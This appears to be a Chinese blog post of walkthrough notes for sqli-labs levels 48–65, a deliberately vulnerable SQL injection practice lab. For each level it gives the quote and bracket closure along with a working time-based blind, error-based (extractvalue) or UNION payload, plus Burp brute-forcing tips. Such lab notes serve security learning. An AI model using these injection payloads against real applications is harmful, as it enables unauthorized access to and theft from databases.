sqllab第48-65关通关笔记

48关知识点:
  • 数值型注入
  • 时间盲注
    • payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)=1
    • 利用bp抓包放到爆破模块中进行爆破
49关知识点:
  • 字符型注入
  • 时间盲注
    • payload:sort=1'%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)='1
    • 利用bp抓包放到爆破模块中进行爆破
50关知识点:
  • 数值型注入
  • 报错注入
    • payload:sort=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
  • 时间盲注
51关知识点:
  • 字符型注入
  • 报错注入
    • payload:sort=1%27and%20extractvalue(1,concat(0x7e,database(),0x7e))=%27
52关知识点:
  • 数值型注入
  • 时间盲注
    • payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(1),0)
    • 通过bp进行爆破处数据库信息
53关知识点:
  • 字符型注入
  • 时间盲注
    • payload:sort=1%27and%20if((mid(database(),1,1)=%27s%27),sleep(1),0)=%271
    • 通过bp进行爆破
54关知识点:
  • 字符型注入
    • 单纯的单引号闭合
  • 联合注入
    • payload:id=0%27%20union%20select%201,database(),3%20%27
    • 获取数据库名后可以尝试获取表名、字段名和数据(5次以内就能找到密钥)
55关知识点:
  • 数值型注入
    • 括号闭合 (id)
  • 联合注入
    • payload:id=0)%20union%20select%201,database(),3%20--+
    • 获取数据库名后可以尝试获取表名、字段名和数据信息
56关知识点:
  • 字符型注入
    • 单引号+括号闭合
  • 联合注入
    • payload:id=0%27)union%20select%201,database(),3%20--+
    • 同上
57关知识点:
  • 字符型注入
    • 双引号闭合
  • 联合注入
    • payload:id=0"%20union%20select%201,database(),3%20"
    • 同上
58关知识点:
  • 字符型注入
    • 单引号闭合
  • 报错注入
    • payload:id=1%27 and extractvalue(1,concat(0x7e,database(),0x7e))=1 --+
    • 接着可以进行表名、字段名、数据信息的读取
59关知识点:
  • 数值型注入
  • 报错注入
    • payload:id=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
60关知识点:
  • 字符型注入
    • 双引号+括号注入
  • 报错注入
    • payload:id=1")%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
61关知识点:
  • 字符型注入
    • 单引号+双括号闭合
  • 报错注入
    • payload:id=1%27))%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
62关知识点:
  • 字符型注入
    • 单引号+括号闭合
  • 时间盲注
    • payload:id=1%27)%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+
    • 如果爆破的话把sleep()时间设久一点儿,方便过滤
63关知识点:
  • 字符型注入
    • 单引号闭合
  • 时间盲注
    • payload:id=1%27%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0--+
    • 同上
64关知识点:
  • 数值型注入
  • 时间盲注
    • payload:id=1%20and%20if((mid(database(),1,1)=%27c%27),sleep(2),0)=0%20
65关知识点:
  • 字符型注入
    • 双引号+括号闭合
  • 时间盲注
    • payload:id=1")%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+

10

相关推荐
fanchenxinok11 小时前
学习笔记:LabVIEW调用DLL解析S19文件教程
笔记·学习·labview·dll解析
疯狂打码的少年12 小时前
【软件工程】结构化设计:模块独立性与耦合内聚
java·开发语言·笔记·软件工程
后季暖14 小时前
langgraph笔记
笔记
·醉挽清风·15 小时前
学习笔记—算法—算法题
笔记·学习·算法
西岸行者16 小时前
硬刚DeepSeek: UDPC与MTFAA的血缘辩论
笔记
a11177616 小时前
机器人导航入门指南(从 0 到 1)
笔记·学习·slam
Nebula_g17 小时前
大模型应用技术速通笔记
笔记·深度学习·机器学习·大模型
xian_wwq17 小时前
【学习笔记】开源 vs 闭源:Llama / Qwen / DeepSeek 生态博弈(34/35)
笔记·学习·开源
浩瀚地学17 小时前
【面试算法笔记】0302-哈希表-哈希表实现
java·经验分享·笔记·算法·面试
hj28625118 小时前
K8S 核心组件与资源概念 + 带注释命令 + 实操案例版笔记
笔记·容器·kubernetes